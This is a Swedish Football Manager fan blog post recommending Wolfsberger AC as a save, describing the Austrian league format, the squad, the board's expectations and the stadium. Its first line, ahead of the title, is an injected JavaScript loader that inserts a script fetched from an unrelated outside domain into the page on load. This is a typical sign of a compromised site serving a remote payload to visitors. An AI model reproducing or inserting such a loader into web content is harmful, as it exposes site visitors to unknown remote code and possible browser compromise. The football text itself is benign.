;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Wolfsberger AC – FMSweden
Meny Stäng

Veckans inspiration: Wolfsberger AC

Turen har kommit till Österrike och närmare bestämt Wolfsberger Athletik Club som under det senaste decenniet etablerat sig som ett topplag i högstaligan bland lag som Austria Wien, LASK Linz, Rapid Wien, Sturm Graz och RB Salzburg. Wolfsberger grundades för 90 år sedan och har mestadels tillbringat sin historia i lägre divisioner, men vann alltså andraligan 2011/12. I övrigt är titelskåpet tomt, men Spurs-supportrar kanske minns 8-1-krossen mot klubben i EL-sextondelsfinalen denna säsong. Det är med andra ord en klubb som är på väg uppåt och närmar sig större framgångar. Sist men absolut inte minst – kolla in klubbmärket! Möcke, möcke bra som Svennis skulle ha sagt.

Österrikiska Bundesliga har ett intressant format. Den innehåller tolv lag där alla möter alla hemma och borta. Därefter delas serien in i två delar: en mästerskapsserie och en nedflyttningsserie med sex lag vardera där alla möter alla två gånger ånyo. I den förstnämnda går fyran och femman vidare till ett slutspel om den sista Europaplatsen, där femman får möta vinnaren av nedflyttningsserie i en semifinal i enkelmöte. Vinnaren i den semin får sedan möta fyran från mästerskapsserien i en final, vilken spelas i ett dubbelmöte. För att krångla till det hela ytterligare så verkar systemet IRL vara annorlunda än det på FM. Men nog om det!

Hur ser Wolfsbergers trupp ut då? Jo, den innehåller faktiskt en svensk i form av den 22-årige mittbacken Gustav Henriksson som nyligen värvats från Elfsborg. Överlag innehåller truppen många spelare som befinner sig i en bra ålder (21-26 år) samtidigt som sju stycken är 29 eller äldre vilket innebär att du behöver fylla på underifrån successivt. Styrelsen vill att du ej köper gamla spelare utan istället utvecklar egna juniorer, vilket alltså är lämpligt sett till truppens struktur. En spelare som måste lyftas fram är den 19-årige mittfältaren Taferner som besitter en mycket fin utvecklingspotential. Tävlingsmässigt begär de en plats på övre halvan i serien, vilket måste ses som realistiskt med tanke på att klubben har två raka tredjeplatser i bagaget. I övrigt har klubben bra faciliteter och en arena med kapacitet för 7300 personer, kanske något litet för större Europamatcher eftersom endast 3500 av dessa är sittplatser. Målet med saven kan till exempel vara att ta klubbens första titel någonsin och etablera sig ännu mer ute i Europa. Eftersom ligan är relativt högt rankad och innehåller ganska få lag ser hoppet ljust ut för att kunna infria dessa förväntningar. Lycka till!

 

Club crest

Please wait...

Liknande Inlägg

Lämna ett svar